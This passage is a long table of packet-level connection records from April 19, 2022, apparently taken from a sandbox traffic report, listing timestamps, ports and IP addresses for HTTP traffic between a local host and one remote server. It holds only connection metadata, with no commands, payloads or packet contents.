Apr 19, 2022 16:44:44.648140907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648261070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648307085 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.648349047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648401022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.648468018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648560047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648713112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648760080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.648828030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.648871899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.648943901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.649183035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.649424076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.649473906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.649775982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.650011063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.650068998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.650274038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.650326014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.650465012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.650705099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.650765896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.650954962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651050091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651184082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651230097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.651277065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651321888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.651401043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651542902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651662111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651707888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.651786089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651834965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.651849031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.651978016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652103901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652148008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.652267933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652311087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.652354956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652410030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652544022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652594090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.652626038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652669907 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.652787924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652865887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.652976036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653019905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.653156042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653207064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.653266907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653357029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653438091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653484106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.653598070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653656960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.653734922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653785944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.653835058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.653882027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654027939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654108047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654158115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.654269934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654325008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.654360056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654495001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654584885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654634953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.654706001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654757023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.654827118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.654937983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655049086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655098915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.655136108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655199051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.655266047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655388117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655464888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655554056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.655586004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655637980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.655745983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655826092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655910015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.655957937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.656038046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656085968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.656147003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656265020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656383991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656433105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.656588078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656611919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656650066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.656738997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656788111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.656855106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.656941891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657088041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657140970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.657176018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657227993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.657273054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657412052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657583952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657639980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.657663107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657747030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657761097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.657843113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657946110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.657994986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.658101082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658148050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.658207893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658354998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658421040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658478975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.658535957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658585072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.658668041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658747911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658910990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.658958912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.658987045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659029961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.659105062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659218073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659310102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659353018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.659459114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659502983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.659584999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659662008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659832001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659879923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.659899950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.659946918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.660027027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660145998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660247087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660296917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.660334110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660377026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.660444021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660629034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660707951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660751104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.660798073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.660854101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.660912037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661068916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661144018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661189079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.661231041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661277056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.661382914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661464930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661588907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661632061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.661691904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661827087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661869049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.661956072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.661997080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.662024975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662214994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662266016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662308931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.662400961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662442923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.662513018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662626028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662708044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662749052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.662847042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.662889004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.662971020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663106918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663180113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663220882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.663300991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663342953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.663420916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663506031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663664103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663706064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.663786888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.663827896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.664161921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664182901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664203882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664221048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664233923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.664268017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.664309978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664432049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664484978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.664541006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664669037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664778948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664825916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.664870977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.664918900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.664990902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665108919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665216923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665271997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.665348053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665397882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.665427923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665565014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665662050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665714979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.665777922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.665822029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.665884972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666026115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666132927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666213036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666228056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.666260004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.666399002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666492939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666591883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666640997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.666688919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666735888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.666832924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.666913986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667032957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667165995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.667187929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667268038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667282104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.667376041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667507887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667602062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667623997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.667659044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.667701006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667876005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667917967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.667964935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.668029070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.668071985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.668159962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.668275118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.668387890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.668431997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.724689007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.724773884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.724818945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.724878073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.724900007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.724916935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.724950075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.725029945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725096941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.725121021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725244045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725399017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725450993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725482941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.725564957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725614071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.725708961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725763083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.725827932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.725981951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726051092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.726075888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726185083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726326942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726392984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.726419926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726471901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.726525068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726681948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726772070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726836920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.726887941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.726955891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.727060080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727160931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727267027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727324009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.727423906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727475882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.727530956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727647066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727706909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727767944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.727866888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.727921963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.731626987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.731692076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.731760979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.731815100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.731909037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.731990099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732040882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.732120037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732198000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.732243061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732333899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732450008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732517004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.732558966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732621908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.732692957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732839108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.732970953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733033895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.733077049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733124018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.733169079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733450890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733563900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733624935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.733686924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733799934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733855963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.733922005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.733994961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.734055042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734110117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.734231949 CEST	80	49758	45.135.48.153	192.168.2.4
